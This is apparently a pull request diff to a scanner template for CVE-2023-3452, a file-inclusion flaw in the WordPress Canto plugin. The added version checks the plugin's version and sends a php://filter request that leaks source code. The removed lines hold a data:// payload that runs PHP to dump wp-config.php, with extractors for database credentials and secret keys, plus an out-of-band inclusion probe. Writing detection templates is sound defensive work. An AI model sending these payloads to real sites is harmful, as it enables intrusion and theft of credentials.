### PR TITLE
Add CVE-2023-3452 for WordPress Canto Plugin RFI/RCE

### DIFF
--- a/http/cves/2023/CVE-2023-3452.yaml
+++ b/http/cves/2023/CVE-2023-3452.yaml
@@ -1,99 +1,60 @@
 id: CVE-2023-3452
 
 info:
-  name: WordPress Canto Plugin <= 3.0.4 - Remote File Inclusion/RCE
+  name: WordPress Canto Plugin <= 3.0.4 - File Inclusion
   author: omarkurt
   severity: critical
   description: |
-    The Canto plugin for WordPress is vulnerable to Remote File Inclusion
-    in versions up to 3.0.4 via the wp_abspath parameter in download.php.
-    The vulnerable code (require_once($_REQUEST['wp_abspath'].'/wp-admin/admin.php'))
-    allows unauthenticated attackers to manipulate the include path.
-    Step 1 uses php://filter (works regardless of allow_url_include) to leak
-    wp-admin/admin.php source code as base64, confirming path manipulation.
-    Step 2 uses interactsh OOB callback to verify RFI (requires allow_url_include=On).
-    Step 3 uses data:// wrapper to execute inline PHP and dump wp-config.php
-    containing database credentials and secrets (requires allow_url_include=On).
+    Canto plugin for WordPress up to version 3.0.4 contains a remote file inclusion caused by the 'wp_abspath' parameter, letting unauthenticated attackers include and execute arbitrary remote code if allow_url_include is enabled, exploit requires allow_url_include to be enabled.
+  impact: |
+    Attackers can execute arbitrary remote code on the server, leading to full server compromise.
+  remediation: |
+    Update to the latest version of the Canto plugin, above 3.0.4, or disable allow_url_include in PHP configuration.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-3452
     - https://www.exploit-db.com/exploits/51826
     - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/canto/canto-304-unauthenticated-remote-file-inclusion
-    - https://github.com/jesusgavancho/CVE-2023-3452-PoC
-    - https://vulnerabletarget.com/VT-2023-3452
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-3452
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2023-3452
     cwe-id: CWE-98
-    cvss-score: 9.8
-  tags: cve,cve2023,wordpress,wp-plugin,canto,rfi,rce,unauth,critical
   metadata:
     verified: true
     max-request: 3
+  tags: cve,cve2023,wordpress,wp-plugin,canto,rfi,rce,unauth,critical
 
-flow: http(1) || http(2) || http(3)
+flow: http(1) && http(2)
 
 http:
-  # Step 1: php://filter - Universal detection (allow_url_include irrelevant)
-  # Leaks wp-admin/admin.php source as base64 via stream wrapper
+  - raw:
+      - |
+        GET /wp-content/plugins/canto/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'compare_versions(version, "<= 3.0.4")'
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9.]+)'
+        internal: true
+
   - raw:
       - |
         GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html HTTP/1.1
         Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: body
-        words:
-          - "PD9waHAK"
-          - "V29yZFByZXNz"
-        condition: or
-
-  # Step 2: interactsh - OOB RFI verification (requires allow_url_include=On)
-  # Server attempts to fetch http://INTERACTSH/wp-admin/admin.php
-  - raw:
-      - |
-        GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://{{interactsh-url}} HTTP/1.1
-        Host: {{Hostname}}
-
-    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
-
-  # Step 3: data:// wrapper - RCE to dump wp-config.php (requires allow_url_include=On)
-  # Reads WordPress config file containing DB credentials and secret keys
-  - raw:
-      - |
-        GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=data://text/plain,<%3fphp+echo+file_get_contents('/var/www/html/wp-config.php')%3bdie()%3b%3f> HTTP/1.1
-        Host: {{Hostname}}
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: body
-        words:
-          - "DB_NAME"
-          - "DB_PASSWORD"
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "PD9waHAK", "V29yZFByZXNz")'
+          - 'status_code == 200'
         condition: and
-
-    extractors:
-      - type: regex
-        name: db-credentials
-        part: body
-        regex:
-          - "define\\( 'DB_(NAME|USER|PASSWORD|HOST)'.*"
-
-      - type: regex
-        name: secret-keys
-        part: body
-        regex:
-          - "define\\( '(AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)'.*"


### PR DESCRIPTION
Added CVE-2023-3452 entry for WordPress Canto Plugin vulnerability with detailed information and exploitation steps.

### PR Information
 
-  Added CVE-2023-3452   
- References: https://vulnerabletarget.com/VT-2023-3452

### Template validation
 
<img width="1155" height="298" alt="image" src="https://github.com/user-attachments/assets/bb4e9d21-8c96-4c21-bf83-9d17acce596d" />
